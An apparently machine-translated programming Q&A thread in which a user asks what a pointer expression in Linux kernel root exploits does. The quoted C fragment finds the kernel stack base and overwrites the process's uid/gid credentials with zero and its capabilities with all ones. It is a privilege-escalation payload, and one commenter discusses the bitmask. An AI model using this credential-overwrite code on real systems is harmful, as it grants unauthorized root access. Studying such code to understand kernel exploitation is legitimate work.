In alcuni exploit per ottenere la shell di root, vedo spesso una tale puntatore:Spiegazione di un puntatore nel codice exploit
int i;
unsigned *p = *(unsigned**)(((unsigned long)&i) & ~8191);
Qualcuno può spiegare questo puntatore un po '? Penso che 8191 sia la dimensione dello stack del kernel. p
punti nella parte inferiore dello stack del kernel ? Ecco come viene usato puntatore p
:
int i;
unsigned *p = *(unsigned**)(((unsigned long)&i) & ~8191);
for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (unsigned *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
Il valore '8191' in binario è' 1111111111111', e il tipo 'long' è di 32 bit. Penso di darti una risposta decisa, avremmo bisogno di vedere come viene usato il puntatore '* p'. L'operatore '&' è probabilmente un po 'maschera di qualche tipo. –
@TimBiegeleisen Grazie per la risposta. L'ho modificato – HuangJie